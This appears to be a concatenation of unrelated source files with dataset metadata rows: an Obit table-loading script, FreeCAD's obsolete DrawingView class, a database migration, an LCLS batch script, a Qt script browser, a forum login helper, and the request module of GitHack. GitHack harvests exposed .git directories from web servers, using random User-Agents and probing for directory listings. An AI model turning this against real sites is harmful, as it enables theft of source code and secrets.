AppendVLTable ("I1936P56.gz")
AppendVLTable ("I1940M40.gz")
AppendVLTable ("I1940P40.gz")
AppendVLTable ("I1940P44.gz")
AppendVLTable ("I1940P48.gz")
AppendVLTable ("I1944M04.gz")
AppendVLTable ("I1944M08.gz")
AppendVLTable ("I1944M12.gz")
AppendVLTable ("I1944M16.gz")
AppendVLTable ("I1944M20.gz")
AppendVLTable ("I1944M24.gz")
AppendVLTable ("I1944M28.gz")
AppendVLTable ("I1944P00.gz")
AppendVLTable ("I1944P04.gz")
AppendVLTable ("I1944P08.gz")
AppendVLTable ("I1944P12.gz")
AppendVLTable ("I1944P16.gz")
AppendVLTable ("I1944P20.gz")
AppendVLTable ("I1944P24.gz")
AppendVLTable ("I1944P28.gz")
AppendVLTable ("I1948M32.gz")
AppendVLTable ("I1948M36.gz")
AppendVLTable ("I1948P32.gz")
AppendVLTable ("I1948P36.gz")
AppendVLTable ("I1948P68.gz")
AppendVLTable ("I2000M04.gz")
AppendVLTable ("I2000M08.gz")
AppendVLTable ("I2000M12.gz")
AppendVLTable ("I2000M16.gz")
AppendVLTable ("I2000M20.gz")
AppendVLTable ("I2000M24.gz")
AppendVLTable ("I2000M28.gz")
AppendVLTable ("I2000M40.gz")
AppendVLTable ("I2000P00.gz")
AppendVLTable ("I2000P04.gz")
AppendVLTable ("I2000P08.gz")
AppendVLTable ("I2000P12.gz")
AppendVLTable ("I2000P16.gz")
AppendVLTable ("I2000P20.gz")
AppendVLTable ("I2000P24.gz")
AppendVLTable ("I2000P28.gz")
AppendVLTable ("I2000P40.gz")
AppendVLTable ("I2000P44.gz")
AppendVLTable ("I2000P48.gz")
AppendVLTable ("I2000P52.gz")
AppendVLTable ("I2000P56.gz")
AppendVLTable ("I2000P60.gz")
AppendVLTable ("I2000P64.gz")
AppendVLTable ("I2000P80.gz")
AppendVLTable ("I2006M32.gz")
AppendVLTable ("I2006M36.gz")
AppendVLTable ("I2006P32.gz")
AppendVLTable ("I2006P36.gz")
AppendVLTable ("I2015P72.gz")
AppendVLTable ("I2015P76.gz")
AppendVLTable ("I2016M04.gz")
AppendVLTable ("I2016M08.gz")
AppendVLTable ("I2016M12.gz")
AppendVLTable ("I2016M16.gz")
AppendVLTable ("I2016M20.gz")
AppendVLTable ("I2016M24.gz")
AppendVLTable ("I2016M28.gz")
AppendVLTable ("I2016P00.gz")
AppendVLTable ("I2016P04.gz")
AppendVLTable ("I2016P08.gz")
AppendVLTable ("I2016P12.gz")
AppendVLTable ("I2016P16.gz")
AppendVLTable ("I2016P20.gz")
AppendVLTable ("I2016P24.gz")
AppendVLTable ("I2016P28.gz")
AppendVLTable ("I2020M40.gz")
AppendVLTable ("I2020P40.gz")
AppendVLTable ("I2020P44.gz")
AppendVLTable ("I2020P48.gz")
AppendVLTable ("I2024M32.gz")
AppendVLTable ("I2024M36.gz")
AppendVLTable ("I2024P32.gz")
AppendVLTable ("I2024P36.gz")
AppendVLTable ("I2024P52.gz")
AppendVLTable ("I2024P56.gz")
AppendVLTable ("I2024P68.gz")
AppendVLTable ("I2030P60.gz")
AppendVLTable ("I2030P64.gz")
AppendVLTable ("I2032M04.gz")
AppendVLTable ("I2032M08.gz")
AppendVLTable ("I2032M12.gz")
AppendVLTable ("I2032M16.gz")
AppendVLTable ("I2032M20.gz")
AppendVLTable ("I2032M24.gz")
AppendVLTable ("I2032M28.gz")
AppendVLTable ("I2032P00.gz")
AppendVLTable ("I2032P04.gz")
AppendVLTable ("I2032P08.gz")
AppendVLTable ("I2032P12.gz")
AppendVLTable ("I2032P16.gz")
AppendVLTable ("I2032P20.gz")
AppendVLTable ("I2032P24.gz")
AppendVLTable ("I2032P28.gz")
AppendVLTable ("I2040M40.gz")
AppendVLTable ("I2040P40.gz")
AppendVLTable ("I2040P44.gz")
AppendVLTable ("I2040P48.gz")
AppendVLTable ("I2042M32.gz")
AppendVLTable ("I2042M36.gz")
AppendVLTable ("I2042P32.gz")
AppendVLTable ("I2042P36.gz")
AppendVLTable ("I2048M04.gz")
AppendVLTable ("I2048M08.gz")
AppendVLTable ("I2048M12.gz")
AppendVLTable ("I2048M16.gz")
AppendVLTable ("I2048M20.gz")
AppendVLTable ("I2048M24.gz")
AppendVLTable ("I2048M28.gz")
AppendVLTable ("I2048P00.gz")
AppendVLTable ("I2048P04.gz")
AppendVLTable ("I2048P08.gz")
AppendVLTable ("I2048P12.gz")
AppendVLTable ("I2048P16.gz")
AppendVLTable ("I2048P20.gz")
AppendVLTable ("I2048P24.gz")
AppendVLTable ("I2048P28.gz")
AppendVLTable ("I2048P52.gz")
AppendVLTable ("I2048P56.gz")
AppendVLTable ("I2100M32.gz")
AppendVLTable ("I2100M36.gz")
AppendVLTable ("I2100M40.gz")
AppendVLTable ("I2100P32.gz")
AppendVLTable ("I2100P36.gz")
AppendVLTable ("I2100P40.gz")
AppendVLTable ("I2100P44.gz")
AppendVLTable ("I2100P48.gz")
AppendVLTable ("I2100P60.gz")
AppendVLTable ("I2100P64.gz")
AppendVLTable ("I2100P68.gz")
AppendVLTable ("I2100P72.gz")
AppendVLTable ("I2100P76.gz")
AppendVLTable ("I2100P80.gz")
AppendVLTable ("I2100P84.gz")
AppendVLTable ("I2100P88.gz")
AppendVLTable ("I2104M04.gz")
AppendVLTable ("I2104M08.gz")
AppendVLTable ("I2104M12.gz")
AppendVLTable ("I2104M16.gz")
AppendVLTable ("I2104M20.gz")
AppendVLTable ("I2104M24.gz")
AppendVLTable ("I2104M28.gz")
AppendVLTable ("I2104P00.gz")
AppendVLTable ("I2104P04.gz")
AppendVLTable ("I2104P08.gz")
AppendVLTable ("I2104P12.gz")
AppendVLTable ("I2104P16.gz")
AppendVLTable ("I2104P20.gz")
AppendVLTable ("I2104P24.gz")
AppendVLTable ("I2104P28.gz")
AppendVLTable ("I2112P52.gz")
AppendVLTable ("I2112P56.gz")
AppendVLTable ("I2118M32.gz")
AppendVLTable ("I2118M36.gz")
AppendVLTable ("I2118P32.gz")
AppendVLTable ("I2118P36.gz")
AppendVLTable ("I2120M04.gz")
AppendVLTable ("I2120M08.gz")
AppendVLTable ("I2120M12.gz")
AppendVLTable ("I2120M16.gz")
AppendVLTable ("I2120M20.gz")
AppendVLTable ("I2120M24.gz")
AppendVLTable ("I2120M28.gz")
AppendVLTable ("I2120M40.gz")
AppendVLTable ("I2120P00.gz")
AppendVLTable ("I2120P04.gz")
AppendVLTable ("I2120P08.gz")
AppendVLTable ("I2120P12.gz")
AppendVLTable ("I2120P16.gz")
AppendVLTable ("I2120P20.gz")
AppendVLTable ("I2120P24.gz")
AppendVLTable ("I2120P28.gz")
AppendVLTable ("I2120P40.gz")
AppendVLTable ("I2120P44.gz")
AppendVLTable ("I2120P48.gz")
AppendVLTable ("I2130P60.gz")
AppendVLTable ("I2130P64.gz")
AppendVLTable ("I2136M04.gz")
AppendVLTable ("I2136M08.gz")
AppendVLTable ("I2136M12.gz")
AppendVLTable ("I2136M16.gz")
AppendVLTable ("I2136M20.gz")
AppendVLTable ("I2136M24.gz")
AppendVLTable ("I2136M28.gz")
AppendVLTable ("I2136M32.gz")
AppendVLTable ("I2136M36.gz")
AppendVLTable ("I2136P00.gz")
AppendVLTable ("I2136P04.gz")
AppendVLTable ("I2136P08.gz")
AppendVLTable ("I2136P12.gz")
AppendVLTable ("I2136P16.gz")
AppendVLTable ("I2136P20.gz")
AppendVLTable ("I2136P24.gz")
AppendVLTable ("I2136P28.gz")
AppendVLTable ("I2136P32.gz")
AppendVLTable ("I2136P36.gz")
AppendVLTable ("I2136P52.gz")
AppendVLTable ("I2136P56.gz")
AppendVLTable ("I2136P68.gz")
AppendVLTable ("I2140M40.gz")
AppendVLTable ("I2140P40.gz")
AppendVLTable ("I2140P44.gz")
AppendVLTable ("I2140P48.gz")
AppendVLTable ("I2145P72.gz")
AppendVLTable ("I2145P76.gz")
AppendVLTable ("I2152M04.gz")
AppendVLTable ("I2152M08.gz")
AppendVLTable ("I2152M12.gz")
AppendVLTable ("I2152M16.gz")
AppendVLTable ("I2152M20.gz")
AppendVLTable ("I2152M24.gz")
AppendVLTable ("I2152M28.gz")
AppendVLTable ("I2152P00.gz")
AppendVLTable ("I2152P04.gz")
AppendVLTable ("I2152P08.gz")
AppendVLTable ("I2152P12.gz")
AppendVLTable ("I2152P16.gz")
AppendVLTable ("I2152P20.gz")
AppendVLTable ("I2152P24.gz")
AppendVLTable ("I2152P28.gz")
AppendVLTable ("I2154M32.gz")
AppendVLTable ("I2154M36.gz")
AppendVLTable ("I2154P32.gz")
AppendVLTable ("I2154P36.gz")
AppendVLTable ("I2200M40.gz")
AppendVLTable ("I2200P40.gz")
AppendVLTable ("I2200P44.gz")
AppendVLTable ("I2200P48.gz")
AppendVLTable ("I2200P52.gz")
AppendVLTable ("I2200P56.gz")
AppendVLTable ("I2200P60.gz")
AppendVLTable ("I2200P64.gz")
AppendVLTable ("I2200P80.gz")
AppendVLTable ("I2208M04.gz")
AppendVLTable ("I2208M08.gz")
AppendVLTable ("I2208M12.gz")
AppendVLTable ("I2208M16.gz")
AppendVLTable ("I2208M20.gz")
AppendVLTable ("I2208M24.gz")
AppendVLTable ("I2208M28.gz")
AppendVLTable ("I2208P00.gz")
AppendVLTable ("I2208P04.gz")
AppendVLTable ("I2208P08.gz")
AppendVLTable ("I2208P12.gz")
AppendVLTable ("I2208P16.gz")
AppendVLTable ("I2208P20.gz")
AppendVLTable ("I2208P24.gz")
AppendVLTable ("I2208P28.gz")
AppendVLTable ("I2212M32.gz")
AppendVLTable ("I2212M36.gz")
AppendVLTable ("I2212P32.gz")
AppendVLTable ("I2212P36.gz")
AppendVLTable ("I2212P68.gz")
AppendVLTable ("I2220M40.gz")
AppendVLTable ("I2220P40.gz")
AppendVLTable ("I2220P44.gz")
AppendVLTable ("I2220P48.gz")
AppendVLTable ("I2224M04.gz")
AppendVLTable ("I2224M08.gz")
AppendVLTable ("I2224M12.gz")
AppendVLTable ("I2224M16.gz")
AppendVLTable ("I2224M20.gz")
AppendVLTable ("I2224M24.gz")
AppendVLTable ("I2224M28.gz")
AppendVLTable ("I2224P00.gz")
AppendVLTable ("I2224P04.gz")
AppendVLTable ("I2224P08.gz")
AppendVLTable ("I2224P12.gz")
AppendVLTable ("I2224P16.gz")
AppendVLTable ("I2224P20.gz")
AppendVLTable ("I2224P24.gz")
AppendVLTable ("I2224P28.gz")
AppendVLTable ("I2224P52.gz")
AppendVLTable ("I2224P56.gz")
AppendVLTable ("I2230M32.gz")
AppendVLTable ("I2230M36.gz")
AppendVLTable ("I2230P32.gz")
AppendVLTable ("I2230P36.gz")
AppendVLTable ("I2230P60.gz")
AppendVLTable ("I2230P64.gz")
AppendVLTable ("I2230P72.gz")
AppendVLTable ("I2230P76.gz")
AppendVLTable ("I2230P84.gz")
AppendVLTable ("I2240M04.gz")
AppendVLTable ("I2240M08.gz")
AppendVLTable ("I2240M12.gz")
AppendVLTable ("I2240M16.gz")
AppendVLTable ("I2240M20.gz")
AppendVLTable ("I2240M24.gz")
AppendVLTable ("I2240M28.gz")
AppendVLTable ("I2240M40.gz")
AppendVLTable ("I2240P00.gz")
AppendVLTable ("I2240P04.gz")
AppendVLTable ("I2240P08.gz")
AppendVLTable ("I2240P12.gz")
AppendVLTable ("I2240P16.gz")
AppendVLTable ("I2240P20.gz")
AppendVLTable ("I2240P24.gz")
AppendVLTable ("I2240P28.gz")
AppendVLTable ("I2240P40.gz")
AppendVLTable ("I2240P44.gz")
AppendVLTable ("I2240P48.gz")
AppendVLTable ("I2248M32.gz")
AppendVLTable ("I2248M36.gz")
AppendVLTable ("I2248P32.gz")
AppendVLTable ("I2248P36.gz")
AppendVLTable ("I2248P52.gz")
AppendVLTable ("I2248P56.gz")
AppendVLTable ("I2248P68.gz")
AppendVLTable ("I2256M04.gz")
AppendVLTable ("I2256M08.gz")
AppendVLTable ("I2256M12.gz")
AppendVLTable ("I2256M16.gz")
AppendVLTable ("I2256M20.gz")
AppendVLTable ("I2256M24.gz")
AppendVLTable ("I2256M28.gz")
AppendVLTable ("I2256P00.gz")
AppendVLTable ("I2256P04.gz")
AppendVLTable ("I2256P08.gz")
AppendVLTable ("I2256P12.gz")
AppendVLTable ("I2256P16.gz")
AppendVLTable ("I2256P20.gz")
AppendVLTable ("I2256P24.gz")
AppendVLTable ("I2256P28.gz")
AppendVLTable ("I2300M40.gz")
AppendVLTable ("I2300P40.gz")
AppendVLTable ("I2300P44.gz")
AppendVLTable ("I2300P48.gz")
AppendVLTable ("I2300P60.gz")
AppendVLTable ("I2300P64.gz")
AppendVLTable ("I2300P80.gz")
AppendVLTable ("I2306M32.gz")
AppendVLTable ("I2306M36.gz")
AppendVLTable ("I2306P32.gz")
AppendVLTable ("I2306P36.gz")
AppendVLTable ("I2312M04.gz")
AppendVLTable ("I2312M08.gz")
AppendVLTable ("I2312M12.gz")
AppendVLTable ("I2312M16.gz")
AppendVLTable ("I2312M20.gz")
AppendVLTable ("I2312M24.gz")
AppendVLTable ("I2312M28.gz")
AppendVLTable ("I2312P00.gz")
AppendVLTable ("I2312P04.gz")
AppendVLTable ("I2312P08.gz")
AppendVLTable ("I2312P12.gz")
AppendVLTable ("I2312P16.gz")
AppendVLTable ("I2312P20.gz")
AppendVLTable ("I2312P24.gz")
AppendVLTable ("I2312P28.gz")
AppendVLTable ("I2312P52.gz")
AppendVLTable ("I2312P56.gz")
AppendVLTable ("I2315P72.gz")
AppendVLTable ("I2315P76.gz")
AppendVLTable ("I2320M40.gz")
AppendVLTable ("I2320P40.gz")
AppendVLTable ("I2320P44.gz")
AppendVLTable ("I2320P48.gz")
AppendVLTable ("I2324M32.gz")
AppendVLTable ("I2324M36.gz")
AppendVLTable ("I2324P32.gz")
AppendVLTable ("I2324P36.gz")
AppendVLTable ("I2324P68.gz")
AppendVLTable ("I2328M04.gz")
AppendVLTable ("I2328M08.gz")
AppendVLTable ("I2328M12.gz")
AppendVLTable ("I2328M16.gz")
AppendVLTable ("I2328M20.gz")
AppendVLTable ("I2328M24.gz")
AppendVLTable ("I2328M28.gz")
AppendVLTable ("I2328P00.gz")
AppendVLTable ("I2328P04.gz")
AppendVLTable ("I2328P08.gz")
AppendVLTable ("I2328P12.gz")
AppendVLTable ("I2328P16.gz")
AppendVLTable ("I2328P20.gz")
AppendVLTable ("I2328P24.gz")
AppendVLTable ("I2328P28.gz")
AppendVLTable ("I2330P60.gz")
AppendVLTable ("I2330P64.gz")
AppendVLTable ("I2336P52.gz")
AppendVLTable ("I2336P56.gz")
AppendVLTable ("I2340M40.gz")
AppendVLTable ("I2340P40.gz")
AppendVLTable ("I2340P44.gz")
AppendVLTable ("I2340P48.gz")
AppendVLTable ("I2342M32.gz")
AppendVLTable ("I2342M36.gz")
AppendVLTable ("I2342P32.gz")
AppendVLTable ("I2342P36.gz")
AppendVLTable ("I2344M04.gz")
AppendVLTable ("I2344M08.gz")
AppendVLTable ("I2344M12.gz")
AppendVLTable ("I2344M16.gz")
AppendVLTable ("I2344M20.gz")
AppendVLTable ("I2344M24.gz")
AppendVLTable ("I2344M28.gz")
AppendVLTable ("I2344P00.gz")
AppendVLTable ("I2344P04.gz")
AppendVLTable ("I2344P08.gz")
AppendVLTable ("I2344P12.gz")
AppendVLTable ("I2344P16.gz")
AppendVLTable ("I2344P20.gz")
AppendVLTable ("I2344P24.gz")
AppendVLTable ("I2344P28.gz")
# Shutdown Obit
OErr.printErr(err)
del ObitSys
| gpl-2.0 | 8,407,360,759,406,397,000 | 29.297659 | 76 | 0.75654 | false | 2.393711 | false | false | false |
Fat-Zer/FreeCAD_sf_master | src/Mod/Draft/draftobjects/drawingview.py | 14 | 8057 | # ***************************************************************************
# * Copyright (c) 2009, 2010 Yorik van Havre <[email protected]> *
# * Copyright (c) 2009, 2010 Ken Cline <[email protected]> *
# * Copyright (c) 2020 Eliud Cabrera Castillo <[email protected]> *
# * *
# * This program is free software; you can redistribute it and/or modify *
# * it under the terms of the GNU Lesser General Public License (LGPL) *
# * as published by the Free Software Foundation; either version 2 of *
# * the License, or (at your option) any later version. *
# * for detail see the LICENCE text file. *
# * *
# * This program is distributed in the hope that it will be useful, *
# * but WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
# * GNU Library General Public License for more details. *
# * *
# * You should have received a copy of the GNU Library General Public *
# * License along with this program; if not, write to the Free Software *
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
# * USA *
# * *
# ***************************************************************************
"""Provides the object code for the DrawingView object (OBSOLETE).
This module is obsolete, since the Drawing Workbench stopped
being developed in v0.17.
The TechDraw Workbench replaces Drawing, and it no longer requires
a `DrawingView` object to display objects in a drawing sheet.
This module is still provided in order to be able to open older files
that use this `DrawingView` object. However, a GUI tool to create
this object should no longer be available.
"""
## @package drawingview
# \ingroup draftobjects
# \brief Provides the object code for the DrawingView object (OBSOLETE).
## \addtogroup draftobjects
# @{
from PySide.QtCore import QT_TRANSLATE_NOOP
import draftfunctions.svg as get_svg
import draftfunctions.dxf as get_dxf
import draftutils.utils as utils
import draftutils.groups as groups
from draftobjects.base import DraftObject
class DrawingView(DraftObject):
"""The DrawingView object. This class is OBSOLETE.
This object was used with the Drawing Workbench, but since this workbench
because obsolete in v0.17, the object should no longer be used.
It is retained for compatibility purposes, that is, to open older
files that may contain this object.
To produce 2D drawings, use TechDraw Workbench.
"""
def __init__(self, obj):
super(DrawingView, self).__init__(obj, "DrawingView")
_tip = QT_TRANSLATE_NOOP("App::Property",
"The linked object")
obj.addProperty("App::PropertyLink",
"Source",
"Base",
_tip)
_tip = QT_TRANSLATE_NOOP("App::Property",
"Projection direction")
obj.addProperty("App::PropertyVector",
"Direction",
"Shape View",
_tip)
_tip = QT_TRANSLATE_NOOP("App::Property",
"The width of the lines inside this object")
obj.addProperty("App::PropertyFloat",
"LineWidth",
"View Style",
_tip)
obj.LineWidth = 0.35
_tip = QT_TRANSLATE_NOOP("App::Property",
"The size of the texts inside this object")
obj.addProperty("App::PropertyLength",
"FontSize",
"View Style",
_tip)
obj.FontSize = 12
_tip = QT_TRANSLATE_NOOP("App::Property",
"The spacing between lines of text")
obj.addProperty("App::PropertyLength",
"LineSpacing",
"View Style",
_tip)
_tip = QT_TRANSLATE_NOOP("App::Property",
"The color of the projected objects")
obj.addProperty("App::PropertyColor",
"LineColor",
"View Style",
_tip)
_tip = QT_TRANSLATE_NOOP("App::Property",
"Shape Fill Style")
obj.addProperty("App::PropertyEnumeration",
"FillStyle",
"View Style",
_tip)
obj.FillStyle = ['shape color'] + list(utils.svgpatterns().keys())
_tip = QT_TRANSLATE_NOOP("App::Property",
"Line Style")
obj.addProperty("App::PropertyEnumeration",
"LineStyle",
"View Style",
_tip)
obj.LineStyle = ['Solid', 'Dashed', 'Dotted', 'Dashdot']
_tip = QT_TRANSLATE_NOOP("App::Property",
"If checked, source objects are displayed "
"regardless of being visible in the 3D model")
obj.addProperty("App::PropertyBool",
"AlwaysOn",
"View Style",
_tip)
def execute(self, obj):
"""Execute when the object is created or recomputed."""
result = ""
if hasattr(obj, "Source") and obj.Source:
if hasattr(obj, "LineStyle"):
ls = obj.LineStyle
else:
ls = None
if hasattr(obj, "LineColor"):
lc = obj.LineColor
else:
lc = None
if hasattr(obj, "LineSpacing"):
lp = obj.LineSpacing
else:
lp = None
if obj.Source.isDerivedFrom("App::DocumentObjectGroup"):
svg = ""
objs = groups.get_group_contents([obj.Source])
for o in objs:
v = o.ViewObject.isVisible()
if hasattr(obj, "AlwaysOn") and obj.AlwaysOn:
v = True
if v:
svg += get_svg.get_svg(o,
obj.Scale,
obj.LineWidth,
obj.FontSize.Value,
obj.FillStyle,
obj.Direction, ls, lc, lp)
else:
svg = get_svg.get_svg(obj.Source,
obj.Scale,
obj.LineWidth,
obj.FontSize.Value,
obj.FillStyle,
obj.Direction, ls, lc, lp)
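        # Wrap the projected geometry in an SVG group: rotate/translate place the
        # view on the page, and scale(s, -s) flips Y because SVG's Y axis points
        # down while the model's points up.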
result += '<g id="' + obj.Name + '"'
result += ' transform="'
result += 'rotate(' + str(obj.Rotation) + ','
result += str(obj.X) + ',' + str(obj.Y)
result += ') '
result += 'translate(' + str(obj.X) + ',' + str(obj.Y) + ') '
result += 'scale(' + str(obj.Scale) + ',' + str(-obj.Scale)
result += ')'
result += '">'
result += svg
result += '</g>'
obj.ViewResult = result
def getDXF(self, obj):
"""Return a DXF fragment."""
return get_dxf.get_dxf(obj)
# Alias for compatibility with v0.18 and earlier
_DrawingView = DrawingView
## @}
| lgpl-2.1 | -6,972,655,767,122,161,000 | 40.963542 | 79 | 0.462083 | false | 4.678862 | false | false | false |
dimitdim/GetARoom | Main/db_repository/versions/004_migration.py | 1 | 1360 | from sqlalchemy import *
from migrate import *
from migrate.changeset import schema
pre_meta = MetaData()
post_meta = MetaData()
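# sqlalchemy-migrate convention: pre_meta describes the schema before this
# migration, post_meta the schema after it; both are bound to the live engine
# inside upgrade()/downgrade() below.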
post = Table('post', post_meta,
Column('id', Integer, primary_key=True, nullable=False),
Column('body', String(length=140)),
Column('timestamp', DateTime),
Column('user_id', Integer),
)
status = Table('status', post_meta,
Column('id', Integer, primary_key=True, nullable=False),
Column('start', Integer),
Column('status', Boolean),
Column('node_id', Integer),
)
user = Table('user', post_meta,
Column('id', Integer, primary_key=True, nullable=False),
Column('nickname', String(length=64)),
Column('email', String(length=120)),
Column('role', SmallInteger, default=ColumnDefault(0)),
)
def upgrade(migrate_engine):
# Upgrade operations go here. Don't create your own engine; bind
# migrate_engine to your metadata
pre_meta.bind = migrate_engine
post_meta.bind = migrate_engine
post_meta.tables['post'].create()
post_meta.tables['status'].create()
post_meta.tables['user'].create()
def downgrade(migrate_engine):
# Operations to reverse the above upgrade go here.
pre_meta.bind = migrate_engine
post_meta.bind = migrate_engine
post_meta.tables['post'].drop()
post_meta.tables['status'].drop()
post_meta.tables['user'].drop()
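
# Sketch of how sqlalchemy-migrate applies this script (the database URL
# and repository path below are placeholders):
#
#   from migrate.versioning import api
#   api.upgrade('sqlite:///app.db', 'db_repository')        # runs upgrade()
#   api.downgrade('sqlite:///app.db', 'db_repository', 3)   # back to version 3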
| gpl-2.0 | 6,732,537,120,585,568,000 | 28.565217 | 68 | 0.675 | false | 3.675676 | false | false | false |
hoidn/LCLS | dataccess/dataccess/autobatch.py | 1 | 1756 | import os
import time
import sys
import argparse
#sys.path.append('/reg/neh/home/ohoidn/anaconda/lib/python2.7/site-packages')
#sys.path.append('/reg/neh/home/ohoidn/anaconda/lib/python2.7/site-packages/pathos-0.2a1.dev0-py2.7.egg')
#sys.path.append('/reg/neh/home/ohoidn/anaconda/lib/python2.7/site-packages/dataccess-1.0-py2.7.egg')
from dataccess import data_access
from dataccess import psget
import config
d4 = psget.get_signal_bg_one_run(688, mode = 'script')
def generate_all_batches(search_range = (-float('inf'), float('inf'))):
rangemin, rangemax = search_range
all_runs = data_access.get_all_runs()
commands = []
for run in all_runs:
if run >= rangemin and run <= rangemax:
for detid in config.detID_list:
commands.append(psget.get_signal_bg_one_run(run, detid = detid, mode = 'script'))
return commands
def submit_all_batches(search_range = (-float('inf'), float('inf'))):
commands = generate_all_batches(search_range = search_range)
for command in commands:
os.system(command)
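
# Example (hypothetical run numbers): only generate and submit batch jobs
# for runs 600 through 700 of the current experiment:
#
#   submit_all_batches(search_range=(600, 700))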
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--min', type = int)
parser.add_argument('--max', type = int)
parser.add_argument('--generate', '-g', action = 'store_true')
parser.add_argument('--submit', '-s', action = 'store_true')
args = parser.parse_args()
    if args.min is not None:
        amin = args.min
    else:
        amin = -float('inf')
    if args.max is not None:
        amax = args.max
    else:
        amax = float('inf')
search_range = (amin, amax)
if args.generate:
generate_all_batches(search_range = search_range)
if args.submit:
submit_all_batches(search_range = search_range)
time.sleep(1000)
| gpl-3.0 | 493,112,196,730,480,000 | 32.132075 | 105 | 0.649203 | false | 3.135714 | false | false | false |
BugScanTeam/GitHack | lib/request.py | 1 | 1722 | #!/usr/bin/env python
# coding:utf-8
"""
Copyright (c) 2017 BugScan (http://www.bugscan.net)
See the file 'LICENCE' for copying permission
"""
import os
import urllib2
import random
from lib.common import writeFile
from lib.data import paths
from lib.data import target
from lib.data import agents
from lib.data import logger
from lib.settings import DEBUG
def randomAgent():
return random.choice(agents)
def request_data(url):
for i in range(3):
data = None
try:
request = urllib2.Request(url, None, {'User-Agent': randomAgent()})
data = urllib2.urlopen(request).read()
if data:
return data
except Exception, e:
if DEBUG:
logger.warning("Request Exception: %s" % str(e))
return None
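
# Quick sanity check for the retrying fetch above (URL is a placeholder):
#
#   head = request_data('http://example.com/.git/HEAD')
#   if head and head.startswith('ref:'):
#       print('exposed .git directory')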
def wget(filepath):
url = "%s%s" % (target.TARGET_GIT_URL, filepath)
filename = os.path.join(paths.GITHACK_DIST_TARGET_GIT_PATH, filepath)
dirname = os.path.dirname(filename)
if not os.path.exists(dirname):
os.makedirs(dirname)
data = request_data(url)
if data:
writeFile(filename, data)
if DEBUG:
logger.success("Get %s => %s" % (url, filepath))
def isdirlist():
keywords = [
"To Parent Directory",
"Index of /",
"Directory Listing For /",
"[转到父目录]",
"objects/",
]
data = request_data(target.TARGET_GIT_URL)
if data:
for key in keywords:
if key in data:
logger.info("%s is support Directory Listing" % target.TARGET_GIT_URL)
return True
logger.info("%s is not support Directory Listing" % target.TARGET_GIT_URL)
return False
| gpl-3.0 | -8,343,839,040,890,184,000 | 24.939394 | 86 | 0.607477 | false | 3.713666 | false | false | false |
csparkresearch/ExpEYES17-Qt | SPARK17/utilities/onlineBrowser.py | 1 | 2400 | # -*- coding: utf-8; mode: python; indent-tabs-mode: t; tab-width:4 -*-
import os,glob
from ..Qt import QtGui, QtCore, QtWidgets
import numpy as np
from .templates import ui_onlineBrowser as onlineBrowser
import pyqtgraph as pg
class dummyApp:
def processEvents(self):
pass
try:
import requests
except:
print ('requests library missing. online browser will not work.')
class onlineBrowser(QtWidgets.QFrame, onlineBrowser.Ui_Form):
trace_names = ['#%d'%a for a in range(10)]
trace_colors = [(0,255,0),(255,0,0),(255,255,100),(10,255,255)]
textfiles=[]
def __init__(self,*args,**kwargs):
super(onlineBrowser, self).__init__()
self.setupUi(self)
self.thumbList = {}
self.downloadedSubdir = kwargs.get('save_directory','ExpEYES_Online')
self.clickCallback = kwargs.get('clickCallback',self.showClickedFile)
self.app = kwargs.get('app',dummyApp())
def refresh(self):
self.generateItemList()
def itemClicked(self,sel):
fname = self.thumbList[str(sel)][1]
print(fname)
self.clickCallback( fname )
def clearItems(self):
for a in self.thumbList:
self.listWidget.takeItem(self.listWidget.row(self.thumbList[a][0]))
self.thumbList={}
def generateItemList(self,**kwargs):
self.clearItems()
url = self.urlEdit.text()
dlPath = url+'getStaticScripts'
print ('downloading from ',dlPath)
self.app.processEvents()
self.textfiles = []
homedir = os.path.expanduser('~')
thumbdir = os.path.join(homedir,self.downloadedSubdir)
if not os.path.isdir(thumbdir):
print ('Directory missing. Will create')
os.makedirs(thumbdir)
requests.get(dlPath,hooks=dict(response=self.processData))
def processData(self,expts,*args,**kwargs):
if expts.status_code == 200:
dirList = expts.json()['staticdata']
for a in dirList:
print ('directory :',a)
scriptList = dirList[a]['data']
for b in scriptList:
try:
#x = QtGui.QIcon(thumbpath)
fname = b['Filename']
filepath = dirList[a]['path']
item = QtGui.QListWidgetItem(fname)#x,fname)
self.listWidget.addItem(item)
self.thumbList[fname] = [item,filepath]
except Exception as e:
print( 'failed to load ',b,e)
else:
print ('got nothing. error:',expts.status_code)
    def loadFromFile(self, plot, curves, filename, histMode=False):
        # Placeholder: loading a fetched script into a plot is not implemented yet.
        print('loadFromFile: not implemented (%s)' % filename)
    def showClickedFile(self, fname):
        # Default clickCallback; it receives the path of the clicked file.
        print('clicked file:', fname)
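
# Embedding sketch (illustrative names; only the kwargs read in __init__
# above are assumed):
#
#   def on_script_clicked(path):
#       print('selected script:', path)
#
#   browser = onlineBrowser(save_directory='ExpEYES_Online',
#                           clickCallback=on_script_clicked,
#                           app=QtWidgets.QApplication.instance())
#   browser.refresh()   # fetches <url>/getStaticScripts and fills the list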
| mit | 6,077,843,050,119,777,000 | 25.966292 | 71 | 0.690833 | false | 3.084833 | false | false | false |
Franciscowxp/PySpider | login.py | 1 | 2922 | # coding=utf-8
import requests
from urllib.parse import urlparse
class Login(object):
"""docstring for Login"""
def __init__(self, **signin):
self.url = signin['url']
if not signin['verify']:
self.logindata = signin['logindata']
self.loginurl = signin['loginurl']
self.login()
else:
self.cookies = signin['cookies']
def login(self):
response = requests.post(self.loginurl, data=self.logindata)
self.cookies = response.cookies
return response
def cookie(self):
pass
    def setCookies(self, cookies):
        self.cookies = cookies
def getheader(self):
pass
def register(self):
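        # Note: despite its name, this posts a Discuz! daily sign-in
        # ("qiandao") form rather than creating an account.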
self.setheader()
url = "http://bbs.ithome.com/plugin.php?id=dsu_paulsign:sign&operation=qiandao&infloat=1&sign_as=1&inajax=1"
data = {"formhash": "14acb1bd",
"qdxq": "nu",
"qdmode": "2",
"todaysay": "",
"fastreply": "0"}
self.cookies.update({"discuz_2132_sendmail":"1","discuz_2132_nofavfid":"1","discuz_2132_connect_is_bind":"0"})
return requests.post(url, data=data, cookies=self.cookies, headers=self.headers).text
def setheader(self):
url = urlparse(self.url)
Referer = url.scheme + "://" + url.netloc
self.headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0",
"Referer": Referer,
"Host": url.netloc,
"Connection": "keep-alive",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
}
